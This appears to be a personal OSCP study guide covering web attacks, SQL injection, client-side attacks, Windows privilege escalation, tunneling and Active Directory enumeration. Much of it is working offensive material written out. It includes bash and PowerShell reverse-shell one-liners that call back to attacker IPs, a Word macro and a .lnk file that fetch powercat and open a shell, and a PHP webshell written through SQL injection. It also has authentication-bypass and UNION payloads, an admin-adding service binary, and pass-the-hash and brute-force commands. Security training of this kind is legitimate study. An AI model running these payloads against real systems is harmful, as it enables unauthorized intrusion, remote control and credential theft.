OSCP
Personal notes/reference guide created while studying for the the OSCP exam.
Intro to Web Application Attacks
- After discovering a web app, use Gobuster to enumerate files/directories exposed by the app. Use the “dir” mode to do this.
- gobuster needs a word list to aid enumeration. You’ll want the list to include “web words” like “js”. Use
/usr/share/wordlists/dirb/[common.txt/big.txt]
- Example:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u "http://xxx.xxx.xxx.xxx/"
- Example:
gobuster dir -w /usr/share/wfuzz/wordlist/general/megabeast.txt -u "http://xxx.xxx.xxx.xxx/" -p PATTERNFILE
- In PATTERFILE, you could a put a pattern to get more control over what patterns are searched. For example, if you want to test API names but you know the URL for the API ends in a version number (which isn’t uncommon), you could make a pattern file that contains the following:
1 2
{GOBUSTER}/v1 {GOBUSTER}/v2
- In PATTERFILE, you could a put a pattern to get more control over what patterns are searched. For example, if you want to test API names but you know the URL for the API ends in a version number (which isn’t uncommon), you could make a pattern file that contains the following:
- NOTE: sometimes it appears that offsec VMs can run slow and gobuster will timeout if using the default timeout (12 seconds). Make it higher (such as 30s) with the
--timeout
option. Also note that to get help for params, usegobuster dir -h
notgobuster -h
.
- Example:
- you can also use the
http-enum.nse
script- see the NSE script library
- Example:
nmap --script http-enum -p443 192.168.221.192
- Enumerate word press site:
nmap -v -p <PORT> --script http-wordpress-enum --script-args search-limit="all",
- gobuster needs a word list to aid enumeration. You’ll want the list to include “web words” like “js”. Use
- Tips for using
nmap
-sV
is an importantnmap
option to remember; I guess you could say it stands for “scan version”. It scans/probes open ports to determine the version
- Determine the technology stack
- Wappalyzer can help you do this
CSRF Outline
- Try finding a default URL
- wordpress example:
/wp-admin/admin.php
- not sure if you can find an enumeration tool to find this. will probably be easier to use info gathered in earlier stages and use google to find default URLs for these pages
- try finding default creds online for the web application to the admin account
- wordpress example:
- find vuln in a web page that doesn’t perform good (or any) user input sanitization
- unclear to me how much of this step the user is expected to do. In the example, it just said “wordpress has a vuln at this spot in this file in the source code” - I’m going to guess that on the test I’ll have to download source code I find online and look through it myself.
- If questions on the test are like the lab, then you’ll eventuall find that there’s some aspect of web request that gets svaed tot the target (ie the user agent field in the http header). Test your they by sending a
<script>alert("test")</script>
to see if you can see this popup - craft a script that does something malicious
- see this section (Intro to Web Application Attacks) for examples
Common Web Application Attacks
File Inclusion Vulnerabilities
Local File Inclusion
- Bash reverse one-liner:
bash -i >& /dev/tcp/192.168.119.3/4444 0>&1
PHP Wrappers
- Official docs for wrappers
- Wrappers enhance and expand php functionality
- For example, if you want to feed a remote file from an ftp server to your php script, you may give your php script this URL:
ftp://example.com/pub/file.txt
- For example, if you want to feed a remote file from an ftp server to your php script, you may give your php script this URL:
- How’s this helpful for pentesters? Well, if a vulnerable webserver is using php to handle http requests, perhaps you can pass in a php wrapper in the URL of a request and get php to resolve the wrapper and return the result.
- If there’s a Local File Inclusion vulnerability on the webserver, this will be especially helpful because we can use wrappers to encode the result returned back to us, which is great if we want to see the contents of a php file on the webserver (and not have its contents be executed, thereby not getting returned to us)
- Example: say
example.com
usesindex.php
to process URLs in http requests from users. The server is vulnerable to a File Inclusion Vulnerability, and a pentester tries to exploit this to see the contents of/var/www/html/target.php
by sending a request for the page at URLhttp://example.com/index.php?page=../../../../../var/www/html/target.php
. This probably won’t work, because the code intarget.php
will be executed and the results returned to the requester, no the actual contents oftarget.php
. But if we use the php://filter wrapperhttp://example.com/index.php?page=php://filter/convert.base64-encode/resource=../../../../../var/www/html/target.php
then the base 64 encoded contents oftarget.php
will be returned to us.
- Example: say
- NOTE: Remote File Inclusion (RFI) vulnerabilities are rare in the wild because a target system would have to specifically configured to allow it.
Remote File Inclusion
- If a web server is configured to interact with remote files, it may be susceptible to RFI exploitation
- Kali has some php web shells that can be used for RFI:
/usr/share/webshells/php/
File Upload Vulnerabilities
OS Command Injection
- When encountering a web page that accepts user input commands:
- Play around to figure out what kind of sanitization it’s doing; figure out how to run a command like “dir” or “ls”
If on windows, use this command to determine if command is executed in cmd or powershell environment:
1
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
- If Powershell, you can use
powercat
at/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
to create a reverse shell with netcat. To get it on the target, use this powershell command in the injection:1
- That powershell will download powercat.ps1 from your computer (make sure to put your IP in there and start a python webserver in the same directory as
powercat.ps1
withpython3 -m http.server 80
, and also have a netcat listener running on port 4444). You’ll have to URL encode it when you throw the replayed http request with Burp Suite or mitmproxy.
- If Powershell, you can use
- Play around to figure out what kind of sanitization it’s doing; figure out how to run a command like “dir” or “ls”
SQL Injection Attacks
SQL Theory and Databases
DB Types and Characteristics
- PEN-200 says that there are numerous types of databases, but this two of the most common that will be looked at in this course (and therefore you should learn for labs) are MySQL and Microsoft SQL Server (MSSQL).
- Remember basic format of query:
SELECT <column(s)> FROM <table> WHERE <condition>
- The condition is used to select rows from the columns. You can
=, <, <=, >=, >
and<>
(which means “not equal”)
- The condition is used to select rows from the columns. You can
- MySQL
- Connect from linux box:
$ mysql -u root -p'root' -h 192.168.50.16 -P 3306
- Note that the
-p
option is weird - make sure to use single quotes and no space between it and the-p
- Note that the
- Retrieve version of instance:
> select version();
- Check current database user for the ongoing session:
> select system_user();
- Collect list of all databases running in MySQL session:
> show databases;
- Select/begin using a database:
- If database already selected:
> SHOW TABLES;
- If database not yet selected:
> SHOW TABLES FROM database_name
- If database already selected:
- Retrieve “user” and “authentication_string” vals from “user” table where “user” equals “offsec”:
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';
- Connect from linux box:
- MSSQL
- Connect to windows machine running MSSQL with impacket:
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
id:: 66044c02-a06c-4d8e-9b96-7c3e4c10b6ab
- Check MSSQL version AND the Windows OS version:
SELECT @@version;
- List available databases:
SELECT name FROM sys.databases;
- List tables from database ‘offsec’:
SELECT * FROM offsec.information_schema.tables;
- Connect to windows machine running MSSQL with impacket:
Manual SQL Exploitation
Identifying SQLi via Error-based Payloads
- Start by appending a special character to the data input field on a target website
- Think about how the underlying parsing may be happening, maybe something like:
1 2 3 4 5 6 7
<?php $uname = $_POST['uname']; $passwd =$_POST['password']; $sql_query = "SELECT * FROM users WHERE user_name= '$uname' AND password='$passwd'"; $result = mysqli_query($con, $sql_query); ?>
- Appending an apostrophe or quotation is a good place to start.
- Think about how the underlying parsing may be happening, maybe something like:
- If you can get an error, see if you can get a authentication bypass. For example, if you use this payload in the above code, then you can read all columns of data for the user “offsec” from the the
users
table:offsec' OR 1=1 -- //
UNION-based Payloads
- UNIONs enable the execution of an extra SELECT statement. For UNION SQLi to work:
- The injected UNION query has to include the same number of columns as the original query.
- The data types need to be compatible between each column.
- So how do you craft a payload?
- Say a website is using our input to craft a query. We need to know exactly how many columns are in the table being queried. To determine this, we could try the SQLi
' ORDER BY 1--//
which will order the columns by the number we supply (eg1
). If use the command to instruct the database to order by the Nth column when the table doesn’t have that many columns, then we will get an error. Therefore, we can start with' ORDER BY 1--//
and increment1
until we get an error, thus informing us how many columns there are. - Use some characters (not explained in detail by offsec) to conclude the first query, then
UNION
, then the second query:%' UNION SELECT database(), user(), @@version, null, null --//
- Note:
@@version
is the syntax tot get the version in MySQL - You need to pad the query with
null
s to the number of columns in the target table (5 in this example)
- Note:
- Say a website is using our input to craft a query. We need to know exactly how many columns are in the table being queried. To determine this, we could try the SQLi
- Try enumerating the MySQL information schema to learn more about other table in the database. Example:
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
Blind SQL Injections
- These rely on interpreting the output from the web application after it queries and displays info form the database.
- Boolean-based SQLi example:
http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //
- time-based SQLi payload example:
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //
- Boolean-based SQLi example:
Manual and Automated Code Execution
Manual Code Execution
- MSSQL has xp_cmdshell which takes a string and passes it to a command shell for execution. It is disabled by default, but can be enabled like so: -
kali@kali:~$ impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation ... SQL> EXECUTE sp_configure 'show advanced options', 1; [*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> RECONFIGURE; SQL> EXECUTE sp_configure 'xp_cmdshell', 1; [*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> RECONFIGURE;
- After configuring xp_cmdshell, we can start executing commands:
SQL> EXECUTE xp_cmdshell 'whoami';
- After configuring xp_cmdshell, we can start executing commands:
- MySQL database variants don’t offer a single function to escalate to RCE, but we can abuse the
SELECT INTO_OUTFILE
statement to write files on the web server.- Note: For this attack to work, the file location must be writable to the OS user running the database software.
- Example:
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
- This query is non-sensical and will probably result in an error, but perhaps not before the reverse shell snippet is written to the destination. If we can then access that file, we’ll get the shell.
- NOTE: Remember to do some research to figure out where to place the file. For example, with MySQL, you’ll probably access a file saved to
/var/www/html/tmp/webshell.php
athttp://xxx.xxx.xxx.xxx/tmp/webshell.php
Automating the Attack
- sqlmap can identify and exploit SQLi vulns against various database engines.
- Examples:
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user
- -u: URL
- -p: test parameter
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump
- Dump entire database
- Does this by taking advantage of time-based SQLi vulnerability, so the process of dumping the whole database is quite slow.
--os-shell
gives us an interactive database shell, but if it relies on blind time-based SQLi, it will be slow to use. Using this parameter with UNION-based SQLi affords a better user experience.sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
-r
: post.txt contains a post request (saved using either Burp or mitmproxy)
- Q4 - Capstone Lab
- The hint bot in discord gives the following hints. Sub bullets are my notes.
- 1) Visit the website and add alvida-eatery.org to your hosts file.
- 2) Analyze the site with tools like Wappalyzer or WhatWeb to identify the CMS (WordPress).
- Not strictly necessary to use an analyzer - after adding alvida-eatery.org to your /etc/hosts file and visiting the website, you’ll see clues on the webpage that it is wordpress.
- 3) Use WPScan to enumerate plugins/themes, searching for known vulnerabilities.
- This is annoying that this is part of the solution because wpscan was not taught as part of the course up to this point.
- I used this wpscan command:
wpscan --url http://alvida-eatery.org --enumerate ap,at --plugins-detection aggressive --api-token <token>
- I recommend piping the output to a file because there’s a lot
- Reading through the output, you’ll see there is a “Unauthenticated SLQ Injection” vuln in the Perfect Survey plugin. This one only stood out among the other vulns because this question is in the SQLi Attacks module. On the final offsec exam, I imagine it’d be good to make a list of the vulnerabilities that look most severe and start there.
- 4) Use the POC in https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad/
- wpscan provides this link in the output as a reference for the aforementioned vulnerability, which provides this information as a POC:
- Change the link from the POC on that page to
http
and replace the domain:http://alvida-eatery.org/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users
- Throw that link in a browser or do a curl request to receive json. On first glance, this just looks like random html and not helpful. If you carefully scan it though, you’ll find this: - ```<input
- 5) By searching wordpress keywords in https://hashcat.net/wiki/doku.php?id=example_hashes, we will notice that wordpress hashes start with $P$ characters. You should take it into account when you are receiving the output.
- Using the command
./hashcat.exe -a 0 -m 400 offsec_10.3.2_Q4.hash rockyou.txt
I found the password to behulabaloo
- Seems like at this point there are numerous ways to get the flag. I used msfconsole:
1 2 3 4 5 6 7
> use exploit/unix/webapp/wp_admin_shell_upload > set username admin > set password hulabaloo > set rhosts alvida-eatery.org > set lhost <my ip> > set lport 4444 > run
- Note: if not sure what options to use for an exploit, enter
show options
after selecting the exploit with theuse
command - This gave me a metasploit shell. For there I poked around till I found
flag.tx
- Alternatively, it seems like another common strategy is to login to the admin portal located at the default wordpress location, then upload a “plugin” that contains a web reverse shell.
- Q5 - Capstone Lab
nmap -p- -v -sV -sC -oN output.txt 192.168.203.48
revealed that there is mysql running on port 3306
Client-side Attacks
Target Reconnaissance
- Use
exiftool
to find information about documents you find, especially pdf files.exiftool -a -u <FILENAME>
Exploiting Microsoft Office
- If
rdesktop
is not working, usexfreerdp
instead. Syntax:xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<IP_ADDR>
Leveraging Microsoft Word Macros
- To get reverse shell using word macro:
- Create a .doc (won’t work with .docx; I haven’t researched why) file
- Go to View > Macros and create a new macro
- Start with this template:
1 2 3 4 5 6 7 8 9 10 11 12 13
Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim Str As String Str = "powershell.exe -nop -w hidden -enc B64_ENCODED_STR_HERE" CreateObject("Wscript.Shell").Run Str End Sub
- Replace the B64 encoded string in
Str
with a command to download powercat.ps1 and then run it in memory. This can be done with:IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
- NOTE: after changing the host/port to the correct values, make sure to use
pwsh
on kali linux (or powershell on a windows box) to encode the command. It will encode differently than other encoders (haven’t figured out why yet). - pwsh command to encode in b64:
- NOTE: after changing the host/port to the correct values, make sure to use
Steps to Obtaining Code Execution via Windows Library Files
- Create windows virtual container ( a .Library.ms file)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://XXX.XXX.XXX.XXX</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>
- create a wsgidav server to serve .lnk file shortcut file
pip install python3-wsgidav
- In directory you want to serve:
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .
- Create a .lnk shortcut file that downloads powercat and runs a powercat command to callback to our computer and open a reverse shell
1 2
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>:<LPORT>/powercat.ps1'); powercat -c <LHOST> -p <NETCAT_PORT> -e powershell"
- Set up a separate web server using python to serve powercat. Offsec said we’re using a different file server other than wsgidav because wsgidav is read/write; some AV will not let a
.lnk
file download a file from a remote location that is read/write. We could make the wsgidav server read only, but it’s nice to keep the write permissions so that once we get the remote shell, we can exfiltrate files from the target.python3 -m http.server <PORT>
- Start a netcat listener on the port specified in the
.lnk
file - Get user to open
.Library.ms
file, then double click the.lnk
file
Antivirus Evasion
AV Evasion in Practice
- TODO: figure out what the powershell “execution policy” is and how it’s at all significant if a user can simply turn it off.
- See execution policy for current user:
Get-ExecutionPolicy -Scope CurrentUser
- Set execution policy for current user:
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
- See execution policy for current user:
- To run a powershell script as a one liner, use a python script to base 64 encode the script.
Password Attacks
- Example http form brute force with hydra:
- Helpful explanation of how to use hydra for forms: https://github.com/gnebbia/hydra_notes?tab=readme-ov-file#http-forms
hydra http-post-form -h
hydra -l user -P /usr/share/wordlists/rockyou.txt http://192.168.200.201 http-post-form '/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid'
- Hydra rdp example:
- Use
-l/-p
if you know the username/password, or-L/-P
to provide a username/password listhydra -l admin-P /usr/share/wordlists/rockyou.txt rdp://192.168.209.227
- very similar syntax for ssh brute force
- Use
- If you can find a ssh key, use ssh2john to turn it into a hash that is crackable with hashcat or john.
- NOTE: sometimes hashcat doesn’t support hashes such as what is output by
ssh2john id_rsa
in this case, use:john --wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules ssh.hash
sshRules
is a custom rule group that I added by putting the following at the end of1 2 3 4 5
... [List.Rules:sshRules] c $1 $3 $7 $! c $1 $3 $7 $@ c $1 $3 $7 $#
- NOTE: sometimes hashcat doesn’t support hashes such as what is output by
- Pass the hash mimikatz commands:
- privilege::debug, token::elevate, and lsadump::sam
- Pass the hash impacket:
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
-The format is
“LMHash:NTHash”, in which we specify the Administrator NTLM hash after
the colon. Since we only use the NTLM hash, we can fill the LMHash
section with 32 0’s.
Working With Password Hashes
- Powershell reverse shell one-liner:
1
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- When base64 encoding commands for use with the
-enc
flag in powershell, make sure you encode Unicode text:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
kali@kali:~$ pwsh PowerShell 7.1.3 Copyright (c) Microsoft Corporation. https://aka.ms/powershell Type 'help' to get help. PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush()};$client.Close()' PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) PS> $EncodedText =[Convert]::ToBase64String($Bytes) PS> $EncodedText JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF MAbwBjAGsAZQB0 ... AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjA GwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
Windows Privilege Escalation
Enumerating Windows
- There’s four security control mechanisms this section covers
- Security Identifier (SID)
- Unique value assigned to each “principal” that can be authenticated by Windows, such as users and groups.
- SID for local accounts and groups is generated by the Local Security Authority (LSA)
- SID for domain users and domain groups is generated on a Domain Controller (DC)
- The SID cannot be changed and is generated when the user or group is created.
- Structure of SID is
S-R-X-Y
- S: is literally an ‘S’, indicating the string is a SID
- R: Revision. Will always be
1
, unless the SID structure is revised in the future. - X: Identifier authority. Indicates the authority that issues the SID. For example, “5” is the most common and specifies the NT Authority.
- Y: sub authorities of the identifier authority.
- Example:
S-1-5-21-1336799502-1441772794-948155058-1001
- Access token
- Contains various pieces of info that effectively describe the security context of a user, or the rules/attributes that are currently in effect for that user.
- The security context consists of the user’s SID, SIDs of the groups that user is a member of, the user and group privileges, and further info describing the scope of the token.
- primary tokens are assigned to processes or thread started by users, and they specify that processes’/thread’s permissions.
- Threads can also have impersonation tokens which provide a different security context than the process that own the thread.
- Contains various pieces of info that effectively describe the security context of a user, or the rules/attributes that are currently in effect for that user.
- Mandatory Integrity Control
- When a process is started or object created, it receives the integrity level of the principal performing the operation.
- From Vista onward, there are 5 integrity levels:
- System: SYSTEM (kernel, …)
- High: Elevated users
- Medium: Standard users
- Low: Very restricted rights often used in sandboxed[^privesc_win_sandbox] processes or for directories storing temporary data
- Untrusted: Lowest integrity level with extremely limited access rights for processes or objects that pose the most potential risk
- Process Explorer (or NtObjectManager can be used to see integrity level of current user.
- The PowerShell processes have the integrity level of High and Medium
- User Account Control (UAC)
- protects the operating system by running most applications and tasks with standard user privileges, even if the user launching them is an Administrator
- Hence, an administrator user receives two access tokens after a successful logon; first token is a standard user token (or a filtered admin token), which performs all non-privileged operations. The second token is a regular administrator token for privileged operations. To use this token, the UAC consent prompt needs to be confirmed id:: 668d5bfe-ebb5-4bb5-afdd-5c86ac754b46
- Good pentesting practice: always obtain the following info:
- Username and hostname
whoami
- Group memberships of the current user
whoami /groups
- Existing users and groups
- Enumerate users:
- net user command
- powershell:
Get-LocalUser
- Enumerate groups:
- powershell:
Get-LocalGroup
- powershell:
net localgroup
- powershell:
- Enumerate users:
- Operating system, version and architecture
- powershell:
systeminfo
- powershell:
- Network information
- Goal is to identify all network interfaces, routes, and active network connections
ipconfig /all
- always check the routing table on a target system to ensure we don’t miss any information
- get all routes of the system:
route print
- get all routes of the system:
- list all active network connections:
netstat -ano
- Installed applications
- We can query to registry keys to list both 32-bit and 64-bit applications in the
Windows Registry
; pipe the output to select with the argument displayname to only display the application’s names:- 32 bit:
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
- 64 bit:
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
- The list from these queries could be incomplete or inaccurate, so always double check by checking the 32 bit and 64 bit Program Files directories in the C drive. Also, review contents of the Downloads directory of the user.
- 32 bit:
- We can query to registry keys to list both 32-bit and 64-bit applications in the
- Running processes
- Get a list of all running processes:
Get-Process
- Get a list of all running processes:
- Username and hostname
- Recursively search the whole C drive for .kdbx files in powershell:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
- You can also search for multiple kinds of files at once:
Get-ChildItem -Path C:\Users\<USER> -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
- Every time you get access to a new user, repeat the process of looking for files containing info hidden in plain view.
- Run cmd prompt as a different user:
runas /user:<USER> cmd
Tip: If
runas
isn’t working but you have access to the GUI, try just running the powershell prompt as administrator and logging in with admin creds
- Powershell logs
- Get list of commands executed in the past:
Get-History
- Will not show commands if past user used
Clear-History
- Will not show commands if past user used
- Get path of history files from PSReadline (a module added in Powershell v5 that records history in a way not cleared by
Clear-History
):(Get-PSReadlineOption).HistorySavePath
- Enter-PSSession - like ssh, but for a windows machine to get a remote powershell on another windows machine.
- You can also use this command to do something similar to
runas
; you can use it to start a powershell session on the same computer running the command but as a different user. However, if you are using a bind shell, the output may be messed up. It’s probably better to use evil-winrm in this case to the connect to the target (not sure what port needs to be open for this to work):evil-winrm -i XXX.XXX.XXX.XXX -u USERNAME -p "PASSWORD"
- You can also use this command to do something similar to
- “PowerShell artifacts such as the history file of PSReadline or transcript files are often a treasure trove of valuable information. We should never skip reviewing them, because most Administrators clear their history with Clear-History and therefore, the PSReadline history stays untouched for us to analyze. Administrators can prevent PSReadline from recording commands by setting the -HistorySaveStyle option to SaveNothing with the Set-PSReadlineOption Cmdlet. Alternatively, they can clear the history file manually.”
- Get list of commands executed in the past:
Automated Enumeration
- Use peass
- On the target, copy the remote peas target to the local target using the iwr cmdlet:
1 2 3 4 5 6 7 8 9
$ cp /usr/share/peass/winpeas/winPEASx64.exe . $ python3 -m http.server 80 # different terminal $ nc 192.168.50.220 4444 # differernt terminal > powershell > iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
Leveraging Windows Services
Service Binary Hijacking
- If a service is not secured during installation and allows full read/write access to all members of the Users group, we can abuse this and replace the program with our own program. Then when our program is executed, it will be executed with the permissions of the service.
- To get a list of windows services, we can use various methods:
- GUID snap-in services.msc
Get-Service
cmdletget-CimInstance
cmdlet (which supersedes theGet-WmiObject
cmdlet)- We are interested in the name, state, and path of the binaries for each service and therefore, use Select with the arguments Name, State, and PathName. In addition, we filter out any services that are not in a Running state by using Where-Object.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
- Next, get permissions of the service binaries you identified in the previous step using
icacls
or Get-ACL- eg:
icacls "C:\xampp\apache\bin\httpd.exe"
icacls
uses these symbols/masks to represent different permssions:- F - Full access
- M - Modify access
- RX - Read and execute access
- R - Read-only access
- W - Write-only access
- Create your own binary to use on the target, eg:
1 2 3 4 5 6 7 8
// compile with 'x86_64-w64-mingw32-gcc adduser.c -o adduser.exe' #include <stdlib.h> int main () { int i; i = system ("net user dave2 password123! /add"); i = system ("net localgroup administrators dave2 /add"); return 0; }
- Send the binary to the target using
iwr
or some other means- eg:
iwr -uri http://xxx.xxx.xxx.xxx/myCustomBin.exe -Outfile myCustomBin.exe
- eg:
- Try restarting the service using
net stop SERVICENAME
. If that doesn’t work, useGet-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'SERVICENAME'}
to check if the service’s StartMode is Auto, in which case we could try to shutdown the system. We can check our privilege to shutdown to the system (among other privileges) withwhoami /priv
- Flow for these challenges:
- Get a list of all installed and Running Windows service
- Determine if there are any services were installed/are running in a directory other than
C:\Windows\System32
- Once identified, enumerate the permissions on those service binaries
- Determine if there are any service binaries with permissions share by a user that you have access to; if so, replace the service binary with a custom binary (being sure to save the original binary in a location you can restore it from if necessary)
- Try restarting the service. If you don’t have permissions to do this, check the StartMode of the service binary; if it is Auto and your user has permission to restart the machine (
whoami /priv
), then restart the machine to trigger execution of the custom binary - This process can be automated using PowerUp
- eg:
Service DLL Hijacking
Unquoted Service Paths
Abusing Other Windows Components
Port Redirection and SSH Tunneling
If you have a shell but need a tty (in order to do ssh), try python3 -c 'import pty; pty.spawn("/bin/sh")'
Lowering the tcp_read_time_out and tcp_connect_time_out values in the Proxychains configuration file will force Proxychains to time-out on non-responsive connections more quickly.
Start an ssh server on kali box: sudo systemctl start ssh
Plink.exe usage: C:\Windows\Temp\plink.exe -ssh -l <USERNAME> -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 <SSH_SERVER_IP>
Tunneling Through Deep Packet Inspection
chisel
Install: sudo apt install chisel
Simple usage (client): chisel client <SERVER_IP>:<PORT> <local-host>:<local-port>:<remote-host>:<remote-port>/<protocol>
If chisel server has --reverse
enabled, then prepending the “remote” with R:
to create a reverse tunnel, ie it makes the server open a listennig port which fowards traffic to the port to the client.
Example:
chisel 192.168.11.84:8080 R:socks
This connects to the server at 192.168.11.84:8080, and tells it to open a listening socks socket (default is port 1080).
The Metasploit Framework
Using Metasploit Payloads
Example searching for payloads in msfvenom: msfvenom -l payloads --platform windows --arch x64
In msfconsole, search for handlers by providing space separated search terms, eg: search multi http
To use the multi handler: use multi/handler
Post Exploitation
In 20.3.2, one lesson uses powershell -ep bypass
. Not sure why this was needed - would be good to look into.
1
You can use Metasploit to bypass UAC. Just typ
After getting a callback, you can background your handler by entering bg
.
Automating Metasploit
View pre-made automation resource scripts: ls -l /usr/share/metasploit-framework/scripts/resource
If you’re script isn’t there, you may have metasploit installed somewhere else. Try using locate
to search for a pre-made resource script such as portscan.rc
.
Active Directory
AD contains critical information about the environment, storing information about users, groups, and computers, each referred to as objects. Permissions set on each object dictate the privileges that object has within the domain.
Manual Enumeration
Enumertaion with Legacy Windows Tools
There’s tons of information in AD. A good place to start is with enumerating users and groups:
Enumerate users on the domain: net user /domain
Get info about a domain user (including whether they are a domain admin): net user <username> /domain
Enumerate domain groups: net group /domain
Get info about a domain group (including which members are part of the group): net user <group_name> /domain
Enumeration with Powershell and .NET Classes
AD enumeration relies on LDAP. When a domain machine searches for an object, like a printer, or when we query user or group objects, LDAP is used as the communication channel for the query. In other words, LDAP is the protocol used to communicate with Active Directory.
LDAP path prototype: LDAP://HostName[:PortNumber][/DistinguishedName]
The DistinguishedName (DN) uniquely identifies an object in AD.
Example of a DN: CN=Stephanie,CN=Users,DC=corp,DC=com
When reading a DN, we start with the Domain Component objects on the right side and move to the left. In the example above, we have four components, starting with two components named DC=corp,DC=com. The Domain Component objects as mentioned above represent the top of an LDAP tree following the required naming standard.
Continuing through the DN, CN=Users represents the Common Name for the container where the user object is stored (also known as the parent container). Finally, all the way to the left, CN=Stephanie represents the Common Name for the user object itself, which is also lowest in the hierarchy.
When enumerating AD, only the Primary Domain Controller (PDC) has the most up to date info. There can only be one PDC per domain. To find the PDC, we ned to find the DC holding the PdcRoleOwner property.
By default, there are protections on Windows that prevent us from accidentally running a powershell script. If you start powershell with the -ep bypass
option, then you can run custom scripts from powershell.
powershell -ep bypass
Adding Search Functionality to our Script
We can add search functionality to our enumeration script by using the DirectoryEntry and DirectorySearcher .NET classes.
1
2
3
4
5
6
7
8
9
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
# This variable encapsulates our LDAP path
$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.FindAll() # this will generate a lot of output
The final .FindAll()
command there generates a lot of output. We can use the DirectorySearcher
’s .filter
method to cut this down.
1
2
3
4
5
6
7
8
9
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
